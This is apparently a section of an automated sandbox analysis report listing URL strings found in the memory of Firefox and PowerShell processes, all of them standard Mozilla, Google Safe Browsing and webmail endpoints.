Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s:
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s987b474c-0394-42cb-b0b9-f5bb10befaec
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sbrowser.fixup.domainsuffixwhitelist.Can
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comvalidateProfilerWebChannelUrladdDevToolsItemsToSubviewtoggleProfilerKeyS
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000010.00000003.3267294438.000001A8B9270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/rambler-authenticator.js
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/rambler-authenticator.jsinternal:privateBrowsingAllowedshims/a
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.combrowser.handlers.migrationsbrowser.tabs.drawInTitlebarSHUTDOWN_CACHE_
Source: firefox.exe, 00000010.00000003.3125375221.000001A8B7F39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235000171.000001A8C38C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239633365.000001A8C31DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Endpoint
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000010.00000003.3239864513.000001A8BFFE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8613000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B86B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B861A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B861A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3333256582.000001A8B7089000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelC:
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
